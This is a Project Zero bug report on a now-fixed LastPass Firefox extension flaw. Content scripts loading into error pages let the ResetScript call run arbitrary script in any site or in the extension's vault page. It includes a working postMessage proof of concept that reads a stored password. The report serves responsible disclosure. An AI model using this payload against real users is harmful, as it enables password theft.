New issue
Advanced search Search tips

Issue 1217 link

Starred by 5 users

Issue metadata

Status: Fixed
Owner:
Closed: May 2017
Cc:



Sign in to add a comment

LastPass: FireFox error pages still load Content Scripts, allowing access to ExtensionProxyService

Project Member Reported by taviso@google.com, Mar 21 2017

Issue description

The fix for  issue 1209  was to prevent loading the special domain `1min-ui-prod.service.lastpass.com`. This works in Chrome, but FireFox loads content scripts into error pages, allowing a similar vulnerability to be exploited.

The list of procedure calls available is completely different, but I noticed that the procedure `ResetScript` will load an arbitrary URL, and then run arbitrary script in it.

This is effectively a UXSS, allowing anyone to compromise any website. But...because the URL being opened is from an extension, it can open non-websafe URLS, e.g. resource://support-at-lastpass-dot-com/data/vault.html. This allows a simple demo where your password can be read back from the vault, e.g.:

        w.postMessage({
            type: "ResetScript",
            data: [
                {
                    appId: 1,
                    url: "resource://support-at-lastpass-dot-com/data/vault.html",
                    appName: "exploit",
                    username: "root",
                    script: 'javascript:setTimeout(\'document.getElementsByClassName("itemButton edit")[1].click()\', 1000);' 
                        +   'setTimeout(\'alert(document.getElementById("siteDialogPassword").value)\',2000);'
                        +   'throw 1;'
                }
            ]
        }, "*")

I uploaded a demo version here (this URL is secret):

https://lock.cmpxchg8b.com/fie5uGae/lastpass.html

It reliably alert()s the password for a random site in my vault.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 
Windows 7-2017-03-21-15-28-52.png
128 KB View Download
Project Member

Comment 1 by taviso@google.com, Mar 22 2017

Labels: -Restrict-View-Commit
It looks like LastPass have released 4.1.36a which fixes this issue.

Firefox users should be automatically updated.

Thanks to LastPass for another super quick response.

Sidenote: I think it might be a Mozilla bug that neterror pages load content scripts, it feels unintentional. I'll file a low-priority bugzilla bug later today.
Project Member

Comment 2 by taviso@google.com, May 4 2017

Status: Fixed (was: New)

Comment 3 Deleted

Sign in to add a comment